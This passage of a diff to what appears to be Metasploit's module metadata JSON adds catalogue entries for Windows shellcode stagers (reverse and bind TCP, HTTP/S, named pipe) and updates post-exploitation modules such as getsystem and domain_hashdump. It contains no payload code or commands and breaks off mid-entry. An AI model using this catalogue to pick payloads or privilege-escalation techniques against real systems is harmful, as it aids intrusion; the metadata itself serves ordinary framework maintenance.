+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/reverse_tcp_allports.rb",
+    "is_install_path": true,
+    "ref_name": "windows/custom/reverse_tcp_allports",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/custom/reverse_tcp_dns": {
+    "name": "Windows shellcode stage, Reverse TCP Stager (DNS)",
+    "fullname": "payload/windows/custom/reverse_tcp_dns",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "skape <mmiller@hick.org>",
+      "sf <stephen_fewer@harmonysecurity.com>",
+      "RageLtMan"
+    ],
+    "description": "Custom shellcode stage. Connect back to the attacker",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/reverse_tcp_dns.rb",
+    "is_install_path": true,
+    "ref_name": "windows/custom/reverse_tcp_dns",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/custom/reverse_tcp_rc4": {
+    "name": "Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption, Metasm)",
+    "fullname": "payload/windows/custom/reverse_tcp_rc4",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "skape <mmiller@hick.org>",
+      "sf <stephen_fewer@harmonysecurity.com>",
+      "mihi",
+      "RageLtMan"
+    ],
+    "description": "Custom shellcode stage. Connect back to the attacker",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4.rb",
+    "is_install_path": true,
+    "ref_name": "windows/custom/reverse_tcp_rc4",
+    "check": false,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/custom/reverse_tcp_rc4_dns": {
+    "name": "Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)",
+    "fullname": "payload/windows/custom/reverse_tcp_rc4_dns",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "skape <mmiller@hick.org>",
+      "sf <stephen_fewer@harmonysecurity.com>",
+      "mihi",
+      "RageLtMan"
+    ],
+    "description": "Custom shellcode stage. Connect back to the attacker",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb",
+    "is_install_path": true,
+    "ref_name": "windows/custom/reverse_tcp_rc4_dns",
+    "check": false,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/custom/reverse_tcp_uuid": {
+    "name": "Windows shellcode stage, Reverse TCP Stager with UUID Support",
+    "fullname": "payload/windows/custom/reverse_tcp_uuid",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "OJ Reeves"
+    ],
+    "description": "Custom shellcode stage. Connect back to the attacker with UUID Support",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/reverse_tcp_uuid.rb",
+    "is_install_path": true,
+    "ref_name": "windows/custom/reverse_tcp_uuid",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/custom/reverse_udp": {
+    "name": "Windows shellcode stage, Reverse UDP Stager with UUID Support",
+    "fullname": "payload/windows/custom/reverse_udp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "RageLtMan <rageltman@sempervictus>"
+    ],
+    "description": "Custom shellcode stage. Connect back to the attacker with UUID Support",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/reverse_udp.rb",
+    "is_install_path": true,
+    "ref_name": "windows/custom/reverse_udp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/custom/reverse_winhttp": {
+    "name": "Windows shellcode stage, Windows Reverse HTTP Stager (winhttp)",
+    "fullname": "payload/windows/custom/reverse_winhttp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "Borja Merino <bmerinofe@gmail.com>"
+    ],
+    "description": "Custom shellcode stage. Tunnel communication over HTTP (Windows winhttp)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/reverse_winhttp.rb",
+    "is_install_path": true,
+    "ref_name": "windows/custom/reverse_winhttp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/custom/reverse_winhttps": {
+    "name": "Windows shellcode stage, Windows Reverse HTTPS Stager (winhttp)",
+    "fullname": "payload/windows/custom/reverse_winhttps",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "Borja Merino <bmerinofe@gmail.com>"
+    ],
+    "description": "Custom shellcode stage. Tunnel communication over HTTPS (Windows winhttp)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/reverse_winhttps.rb",
+    "is_install_path": true,
+    "ref_name": "windows/custom/reverse_winhttps",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
  "payload_windows/dllinject/bind_hidden_ipknock_tcp": {
    "name": "Reflective DLL Injection, Hidden Bind Ipknock TCP Stager",
    "fullname": "payload/windows/dllinject/bind_hidden_ipknock_tcp",
@@ -190003,7 +194764,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-04-29 15:18:51 +0000",
+    "mod_time": "2022-05-23 11:55:38 +0000",
    "path": "/modules/payloads/singles/windows/meterpreter_bind_named_pipe.rb",
    "is_install_path": true,
    "ref_name": "windows/meterpreter_bind_named_pipe",
@@ -190039,7 +194800,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-04-29 15:18:51 +0000",
+    "mod_time": "2022-05-23 11:55:38 +0000",
    "path": "/modules/payloads/singles/windows/meterpreter_bind_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/meterpreter_bind_tcp",
@@ -190075,7 +194836,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-04-29 15:18:51 +0000",
+    "mod_time": "2022-05-23 11:55:38 +0000",
    "path": "/modules/payloads/singles/windows/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "windows/meterpreter_reverse_http",
@@ -190111,7 +194872,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-04-29 15:18:51 +0000",
+    "mod_time": "2022-05-23 11:55:38 +0000",
    "path": "/modules/payloads/singles/windows/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "windows/meterpreter_reverse_https",
@@ -190147,7 +194908,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-04-29 15:18:51 +0000",
+    "mod_time": "2022-05-23 11:55:38 +0000",
    "path": "/modules/payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/meterpreter_reverse_ipv6_tcp",
@@ -190183,7 +194944,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-04-29 15:18:51 +0000",
+    "mod_time": "2022-05-23 11:55:38 +0000",
    "path": "/modules/payloads/singles/windows/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "windows/meterpreter_reverse_tcp",
@@ -195106,6 +199867,511 @@
    "session_types": false,
    "needs_cleanup": false
  },
+  "payload_windows/x64/custom/bind_ipv6_tcp": {
+    "name": "Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager",
+    "fullname": "payload/windows/x64/custom/bind_ipv6_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "sf <stephen_fewer@harmonysecurity.com>"
+    ],
+    "description": "Custom shellcode stage. Listen for an IPv6 connection (Windows x64)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x64",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/x64/bind_ipv6_tcp.rb",
+    "is_install_path": true,
+    "ref_name": "windows/x64/custom/bind_ipv6_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/x64/custom/bind_ipv6_tcp_uuid": {
+    "name": "Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager with UUID Support",
+    "fullname": "payload/windows/x64/custom/bind_ipv6_tcp_uuid",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "sf <stephen_fewer@harmonysecurity.com>",
+      "OJ Reeves"
+    ],
+    "description": "Custom shellcode stage. Listen for an IPv6 connection with UUID Support (Windows x64)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x64",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb",
+    "is_install_path": true,
+    "ref_name": "windows/x64/custom/bind_ipv6_tcp_uuid",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/x64/custom/bind_named_pipe": {
+    "name": "Windows shellcode stage, Windows x64 Bind Named Pipe Stager",
+    "fullname": "payload/windows/x64/custom/bind_named_pipe",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "UserExistsError"
+    ],
+    "description": "Custom shellcode stage. Listen for a pipe connection (Windows x64)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x64",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/x64/bind_named_pipe.rb",
+    "is_install_path": true,
+    "ref_name": "windows/x64/custom/bind_named_pipe",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/x64/custom/bind_tcp": {
+    "name": "Windows shellcode stage, Windows x64 Bind TCP Stager",
+    "fullname": "payload/windows/x64/custom/bind_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "sf <stephen_fewer@harmonysecurity.com>"
+    ],
+    "description": "Custom shellcode stage. Listen for a connection (Windows x64)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x64",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/x64/bind_tcp.rb",
+    "is_install_path": true,
+    "ref_name": "windows/x64/custom/bind_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/x64/custom/bind_tcp_rc4": {
+    "name": "Windows shellcode stage, Bind TCP Stager (RC4 Stage Encryption, Metasm)",
+    "fullname": "payload/windows/x64/custom/bind_tcp_rc4",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "skape <mmiller@hick.org>",
+      "sf <stephen_fewer@harmonysecurity.com>",
+      "mihi",
+      "max3raza",
+      "RageLtMan"
+    ],
+    "description": "Custom shellcode stage. Connect back to the attacker",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x64",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/x64/bind_tcp_rc4.rb",
+    "is_install_path": true,
+    "ref_name": "windows/x64/custom/bind_tcp_rc4",
+    "check": false,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/x64/custom/bind_tcp_uuid": {
+    "name": "Windows shellcode stage, Bind TCP Stager with UUID Support (Windows x64)",
+    "fullname": "payload/windows/x64/custom/bind_tcp_uuid",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "sf <stephen_fewer@harmonysecurity.com>",
+      "OJ Reeves"
+    ],
+    "description": "Custom shellcode stage. Listen for a connection with UUID Support (Windows x64)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x64",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb",
+    "is_install_path": true,
+    "ref_name": "windows/x64/custom/bind_tcp_uuid",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/x64/custom/reverse_http": {
+    "name": "Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)",
+    "fullname": "payload/windows/x64/custom/reverse_http",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "OJ Reeves"
+    ],
+    "description": "Custom shellcode stage. Tunnel communication over HTTP (Windows x64 wininet)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x64",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/x64/reverse_http.rb",
+    "is_install_path": true,
+    "ref_name": "windows/x64/custom/reverse_http",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/x64/custom/reverse_https": {
+    "name": "Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)",
+    "fullname": "payload/windows/x64/custom/reverse_https",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "agix",
+      "rwincey"
+    ],
+    "description": "Custom shellcode stage. Tunnel communication over HTTP (Windows x64 wininet)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x64",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/x64/reverse_https.rb",
+    "is_install_path": true,
+    "ref_name": "windows/x64/custom/reverse_https",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/x64/custom/reverse_named_pipe": {
+    "name": "Windows shellcode stage, Windows x64 Reverse Named Pipe (SMB) Stager",
+    "fullname": "payload/windows/x64/custom/reverse_named_pipe",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "OJ Reeves"
+    ],
+    "description": "Custom shellcode stage. Connect back to the attacker via a named pipe pivot",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x64",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/x64/reverse_named_pipe.rb",
+    "is_install_path": true,
+    "ref_name": "windows/x64/custom/reverse_named_pipe",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/x64/custom/reverse_tcp": {
+    "name": "Windows shellcode stage, Windows x64 Reverse TCP Stager",
+    "fullname": "payload/windows/x64/custom/reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "sf <stephen_fewer@harmonysecurity.com>"
+    ],
+    "description": "Custom shellcode stage. Connect back to the attacker (Windows x64)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x64",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/x64/reverse_tcp.rb",
+    "is_install_path": true,
+    "ref_name": "windows/x64/custom/reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/x64/custom/reverse_tcp_rc4": {
+    "name": "Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption, Metasm)",
+    "fullname": "payload/windows/x64/custom/reverse_tcp_rc4",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "skape <mmiller@hick.org>",
+      "sf <stephen_fewer@harmonysecurity.com>",
+      "mihi",
+      "max3raza",
+      "RageLtMan"
+    ],
+    "description": "Custom shellcode stage. Connect back to the attacker",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x64",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/x64/reverse_tcp_rc4.rb",
+    "is_install_path": true,
+    "ref_name": "windows/x64/custom/reverse_tcp_rc4",
+    "check": false,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/x64/custom/reverse_tcp_uuid": {
+    "name": "Windows shellcode stage, Reverse TCP Stager with UUID Support (Windows x64)",
+    "fullname": "payload/windows/x64/custom/reverse_tcp_uuid",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "sf <stephen_fewer@harmonysecurity.com>",
+      "OJ Reeves"
+    ],
+    "description": "Custom shellcode stage. Connect back to the attacker with UUID Support (Windows x64)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x64",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb",
+    "is_install_path": true,
+    "ref_name": "windows/x64/custom/reverse_tcp_uuid",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/x64/custom/reverse_winhttp": {
+    "name": "Windows shellcode stage, Windows x64 Reverse HTTP Stager (winhttp)",
+    "fullname": "payload/windows/x64/custom/reverse_winhttp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "OJ Reeves"
+    ],
+    "description": "Custom shellcode stage. Tunnel communication over HTTP (Windows x64 winhttp)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x64",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/x64/reverse_winhttp.rb",
+    "is_install_path": true,
+    "ref_name": "windows/x64/custom/reverse_winhttp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/x64/custom/reverse_winhttps": {
+    "name": "Windows shellcode stage, Windows x64 Reverse HTTPS Stager (winhttp)",
+    "fullname": "payload/windows/x64/custom/reverse_winhttps",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "OJ Reeves"
+    ],
+    "description": "Custom shellcode stage. Tunnel communication over HTTPS (Windows x64 winhttp)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x64",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/x64/reverse_winhttps.rb",
+    "is_install_path": true,
+    "ref_name": "windows/x64/custom/reverse_winhttps",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
  "payload_windows/x64/encrypted_shell/reverse_tcp": {
    "name": "Windows Command Shell, Encrypted Reverse TCP Stager",
    "fullname": "payload/windows/x64/encrypted_shell/reverse_tcp",
@@ -199159,7 +204425,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-02-15 14:35:38 +0000",
+    "mod_time": "2022-09-01 14:56:28 +0000",
    "path": "/modules/post/linux/gather/enum_system.rb",
    "is_install_path": true,
    "ref_name": "linux/gather/enum_system",
@@ -200381,17 +205647,17 @@
      "Carlos Perez <carlos_perez@darkoperator.com>",
      "egypt <egypt@metasploit.com>"
    ],
-    "description": "This module prints out the operating system environment variables",
+    "description": "This module prints out the operating system environment variables.",
    "references": [

    ],
-    "platform": "Linux,Windows",
+    "platform": "Linux,Unix,Windows",
    "arch": "",
    "rport": null,
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2022-08-01 13:37:15 +0000",
    "path": "/modules/post/multi/gather/env.rb",
    "is_install_path": true,
    "ref_name": "multi/gather/env",
@@ -200399,8 +205665,18 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
    },
    "session_types": [
+      "powershell",
      "shell",
      "meterpreter"
    ],
@@ -202118,7 +207394,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-03-22 10:24:25 +0000",
+    "mod_time": "2022-05-27 10:21:59 +0000",
    "path": "/modules/post/multi/manage/shell_to_meterpreter.rb",
    "is_install_path": true,
    "ref_name": "multi/manage/shell_to_meterpreter",
@@ -202377,7 +207653,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-11-04 05:28:32 +0000",
+    "mod_time": "2022-05-24 08:44:37 +0000",
    "path": "/modules/post/multi/recon/sudo_commands.rb",
    "is_install_path": true,
    "ref_name": "multi/recon/sudo_commands",
@@ -203874,7 +209150,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-01-14 16:55:43 +0000",
+    "mod_time": "2022-06-23 18:43:18 +0000",
    "path": "/modules/post/windows/escalate/getsystem.rb",
    "is_install_path": true,
    "ref_name": "windows/escalate/getsystem",
@@ -203882,6 +209158,14 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "AKA": [
+        "Named Pipe Impersonation",
+        "Token Duplication",
+        "RPCSS",
+        "PrintSpooler",
+        "EFSRPC",
+        "EfsPotato"
+      ]
    },
    "session_types": [
      "meterpreter"
@@ -204329,7 +209613,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-04-02 10:43:57 +0000",
+    "mod_time": "2022-07-20 17:21:58 +0000",
    "path": "/modules/post/windows/gather/checkvm.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/checkvm",
@@ -204750,7 +210034,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2022-08-20 12:16:26 +0000",
    "path": "/modules/post/windows/gather/credentials/domain_hashdump.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/credentials/domain_hashdump",
@@ -207934,7 +213218,7 @@
    "author": [
      "averagesecurityguy <stephen@averagesecurityguy.info>"
    ],
-    "description": "This module will check the file system and registry for particular artifacts. The\n        list of artifacts is read from data/post/enum_artifacts_list.txt or a user specified file. Any\n        matches are written to the loot.",
+    "description": "This module will check the file system and registry for particular artifacts.\n\n          The list of artifacts is read in YAML format from data/post/enum_artifacts_list.txt\n          or a user specified file. Any matches are written to the loot.",
    "references": [

    ],
@@ -207944,7 +213228,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2022-08-07 16:01:45 +0000",
    "path": "/modules/post/windows/gather/enum_artifacts.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/enum_artifacts",
@@ -207952,8 +213236,19 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
    },
    "session_types": [
+      "shell",
+      "powershell",
      "meterpreter"
    ],
    "needs_cleanup": null
@@ -208285,7 +213580,7 @@
    "author": [
      "Joshua Abraham <jabra@rapid7.com>"
    ],
-    "description": "This module identifies the primary domain via the registry. The registry value used is:\n          HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\History\\DCName.",
+    "description": "This module identifies the primary Active Directory domain name\n          and domain controller.",
    "references": [

    ],
@@ -208295,7 +213590,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2022-09-08 13:35:22 +0000",
    "path": "/modules/post/windows/gather/enum_domain.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/enum_domain",
@@ -208303,9 +213598,20 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
    },
    "session_types": [
-      "meterpreter"
+      "meterpreter",
+      "shell",
+      "powershell"
    ],
    "needs_cleanup": null
  },
@@ -208368,7 +213674,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2022-08-20 12:16:26 +0000",
    "path": "/modules/post/windows/gather/enum_domain_tokens.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/enum_domain_tokens",
@@ -208658,7 +213964,7 @@
    "author": [
      "Carlos Perez <carlos_perez@darkoperator.com>"
    ],
-    "description": "This module will enumerate current and recently logged on Windows users",
